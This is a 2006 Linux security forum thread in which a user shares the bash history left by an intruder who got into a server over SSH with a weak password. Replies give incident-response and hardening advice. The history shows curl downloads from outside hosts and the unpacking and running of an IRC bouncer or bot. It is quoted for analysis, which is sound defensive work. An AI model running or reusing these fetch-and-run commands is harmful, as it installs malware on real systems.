LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 06-19-2006, 08:22 AM   #1
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Rep: Reputation: 15
machine break in


ok i found out one of my boxes was hacked over the weekend, found this is the bash history - any ideas? the file they downloaded an ran is some kind of irc bouner.


w
/sbin/ifconfig |grep inet
cat /etc/hosts
passwd
cd ..
cd ..
cd ..
cd /var/tmp
cd ..
cd ..
cd tmp
tar xzvf psydrawin.tar.gz
cd psybnc
chmod +x *
make
./psybnc
cd ..
curl -O www.channel.as.ro/psyd.tar.gz
tar xzvf psyd.tar.gz
cd psybnc
./psybnc
cd ..
curl -O atac.uv.ro/DFL
tar xzvf DFL
cd .virtual
chmod +x *
./darwin
 
Old 06-19-2006, 09:04 AM   #2
binary_y2k2
Member
 
Registered: Jul 2005
Location: England, UK
Distribution: Ubuntu 8.04 Server, Kubuntu 12.04
Posts: 698
Blog Entries: 1

Rep: Reputation: 31
looks like it defiantly some kind of IRC bot.
 
Old 06-19-2006, 09:05 AM   #3
fedora4002
Member
 
Registered: Mar 2004
Posts: 135

Rep: Reputation: 15
Do you know how he get in?
 
Old 06-19-2006, 09:22 AM   #4
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Original Poster
Rep: Reputation: 15
yep ssh - i only started here last week and only found out this server let's jst say 3 letter username (very common protocol) with matching password!!! - tottally stupid password and username there
 
Old 06-21-2006, 03:18 AM   #5
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
You should unplug your network cable. Then they surely cant come back in.
And then run chkrootkit and rkhunter to check for possible rootkits. And change passwords.

Last edited by Fadoksi; 06-21-2006 at 03:21 AM.
 
Old 06-21-2006, 11:30 AM   #6
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Original Poster
Rep: Reputation: 15
ah i just shutdown the machine as soon as i found out, just culled the os and did a re-install with better passwrds
 
Old 06-21-2006, 11:45 AM   #7
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
Allright then. I hope you better luck this time
 
Old 06-21-2006, 12:20 PM   #8
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
re-install with better passwrds
Is better passes really *all* you did?
 
Old 06-21-2006, 11:48 PM   #9
fedora4002
Member
 
Registered: Mar 2004
Posts: 135

Rep: Reputation: 15
It is better than nothing.
 
Old 06-22-2006, 02:20 AM   #10
Zmyrgel
Senior Member
 
Registered: Dec 2005
Location: Finland
Distribution: Slackware, CentOS, RHEL, OpenBSD
Posts: 1,006

Rep: Reputation: 37
Have you checked the sshd_config file? Atleast make it more secure and delete all unnecessary services from running.
 
Old 06-22-2006, 07:18 AM   #11
Israfel2000
Member
 
Registered: May 2004
Location: Underground base in the mountains
Distribution: FreeBSD, Fedora, Ubuntu
Posts: 87
Blog Entries: 2

Rep: Reputation: 18
Instead of using password authentication for your ssh use the private key authentication. It's more secure this way. If you are going to use a password remember to change your password frequently. You don't want another hacker to break into your computer.
 
Old 06-22-2006, 07:36 AM   #12
nlinecomputers
Member
 
Registered: Aug 2005
Location: Midland, TX
Distribution: Ubuntu
Posts: 125

Rep: Reputation: 15
I always set SSH to use only keys, to a fixed set of users, and I put it on a different port. NOT 22.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Possible Break In??? stlyz3 Linux - Security 9 10-26-2005 02:43 PM
How does it all break down? Bu3Nix Slackware - Installation 5 09-15-2005 02:50 PM
could I break my pc? linuxhippy Slackware 9 04-02-2005 07:15 AM
Oh I'm sorry, did I break your concentration? slightcrazed General 11 01-23-2004 08:05 AM
Could someone please break it down for me...? Pwcca Slackware 6 01-23-2003 10:05 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 04:43 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration